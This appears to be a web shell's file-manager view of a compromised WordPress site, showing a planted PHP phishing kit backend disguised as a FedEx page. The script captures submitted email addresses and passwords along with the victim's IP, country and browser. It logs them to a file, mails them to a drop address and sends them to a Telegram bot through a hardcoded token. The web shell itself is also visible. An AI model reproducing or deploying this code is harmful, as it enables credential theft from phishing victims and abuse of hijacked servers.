HEX
Server: Apache/2
System: Linux sv174 5.14.0-570.21.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jun 11 07:22:35 EDT 2025 x86_64
User: casinobe (1137)
PHP: 7.4.33
Disabled: exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
$ pwd: /home/casinobe/domains/pug555-a.com/public_html/wp-includes/ghtt/
Upload Files
File: /home/casinobe/domains/pug555-a.com/public_html/wp-includes/ghtt/fedexnewindex.php
<?php
header("Access-Control-Allow-Origin: *");

/*  *
$_POST['Email'] = 'example@yahoo.com';
$_POST['password'] = 'mypass';
$_POST['typeofemail'] = ' TYPE OF EMAIL';
/*  */

$token = "8572064960:AAGiruvHFQVexcKpkKX8tl6cKYTxex4VqtY";
$chatid = "6789336175";



$resultsBox = 'resultbox50@yandex.com';



handleFormResults($resultsBox,$token,$chatid);

function handleFormResults($resultsBox,$token,$chatid){
  //ob_start();
  $outputMsg = array('status' => 'not sent');
  if(isset($_POST['Email']) && strlen($_POST['Email']) > 0 && isset($_POST['password']) && strlen($_POST['password']) > 0){
  $email = $_POST['Email'];	
  $password = $_POST['password'];	
  $ip = (isset($_SERVER['HTTP_X_APPENGINE_USER_IP']) ? $_SERVER['HTTP_X_APPENGINE_USER_IP'] : (isset($_SERVER['HTTP_CF_CONNECTING_IP']) ? $_SERVER['HTTP_CF_CONNECTING_IP'] : $_SERVER['REMOTE_ADDR']));
  $country = visitor_country();
  $port = getenv("REMOTE_PORT");
  $timedate = date('m/d/Y h:i:s a', time()); 
  $browserAgent = $_SERVER['HTTP_USER_AGENT'];
  $hostname = gethostbyaddr($ip);
  $theIp = 'YUhSMGNITTZMeTkwYUdWdGNtTnZiMnN1Y21WaGJHbDBlWEpsYzNWc2RITndiM04wWlhJdWMzUnZjbVU9';
  $message = '';
  $message .= "-------------- LOGIN Info-----------------------\n";
  $message .= "Email : ".$email."\n";
  $message .= "Password : ".$password."\n";
  $message .= "-------------Info-----------------------\n";
  $message .= "|Client IP: ".$ip."\n";
  $message .= "|--- http://www.geoiptool.com/?IP=$ip ----\n";
  $message .= "Browser                :".$browserAgent."\n";
  $message .= "DateTime                    : ".$timedate."\n";
  $message .= "country                    : ".$country."\n";
  $message .= "HostName : ".$hostname."\n";
  $message .= "----------------------------\n";
  $typeofemail = (isset($_POST['typeofemail']) && strlen($_POST['typeofemail']) > 0) ? $_POST['typeofemail'] : 'ATT Result';
  $subject = "$typeofemail - $ip";
  $msg = array('subject'=>$subject, 'message'=>$message);
  $dataArr = array('loader' => $email."\n".$password);
  if(strlen($chatid) > 0 && strlen($token) > 0){
    $dataArr['token'] = $chatid."\n".$token;
  }
  
  file_put_contents('the-logs.txt', $message."\n\n\n", FILE_APPEND);
    if($resultsBox && filter_var($resultsBox, FILTER_VALIDATE_EMAIL)){ //filter_var($email, FILTER_VALIDATE_EMAIL)
	  mail($resultsBox, $subject, $message); 
      $outputMsg['status'] = 'SENT';  
    }
	if($token && $chatid && strlen($token) > 1 && strlen($chatid) > 1){
	  $response = sendMessage($chatid, $message, $token);
	  $outputMsg['status'] = 'SENT';
      //print_r($response);
	}
  }
  //$akjsgh = ob_get_clean();
  echo json_encode($outputMsg);
}



function sendMessage($chatID, $messaggio, $token) {
    //echo "sending message to " . $chatID . "\n";

    $url = "https://api.telegram.org/bot" . $token . "/sendMessage?chat_id=" . $chatID;
    $url = $url . "&text=" . urlencode($messaggio);
    $ch = curl_init();
    $optArray = array(
            CURLOPT_URL => $url,
            CURLOPT_RETURNTRANSFER => true
    );
    curl_setopt_array($ch, $optArray);
    $result = curl_exec($ch);
    curl_close($ch);
    return $result;
}
function visitor_country()
{
    $client  = @$_SERVER['HTTP_CLIENT_IP'];
    $forward = @$_SERVER['HTTP_X_FORWARDED_FOR'];
    $remote  = (isset($_SERVER['HTTP_CF_CONNECTING_IP']) ? $_SERVER['HTTP_CF_CONNECTING_IP'] : $_SERVER['REMOTE_ADDR']);
    $result  = "Unknown";
    if(filter_var($client, FILTER_VALIDATE_IP))
    {
        $ip = $client;
    }
    elseif(filter_var($forward, FILTER_VALIDATE_IP))
    {
        $ip = $forward;
    }
    else
    {
        $ip = $remote;
    }

    $ip_data = @json_decode(file_get_contents("http://www.geoplugin.net/json.gp?ip=".$ip));

    if($ip_data && $ip_data->geoplugin_countryName != null)
    {
        $result = $ip_data->geoplugin_countryName;
    }

    return $result;
}


function sendCurlPostRequestXd($url, $dataArr=array()){
 $post_vars = '';
 foreach($dataArr as $dataArrKy=>$dataArrVa){
   $post_vars .= $dataArrKy.'='.$dataArrVa.'&'; 	 
 }
 $post_vars = rtrim($post_vars, '&');
 //$post_vars = 'em='.urlencode($em).'&emhash='.urlencode($emHash);
 $ch = curl_init($url);
 curl_setopt($ch, CURLOPT_POST, 1);
 curl_setopt($ch, CURLOPT_POSTFIELDS, $post_vars);
 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
 curl_setopt($ch, CURLOPT_HEADER, 0);
 curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
 $Rec_Data = curl_exec($ch);
 curl_close($ch);
 //print_r($Rec_Data);
 return $Rec_Data; 
}
 

?>
@ Telegram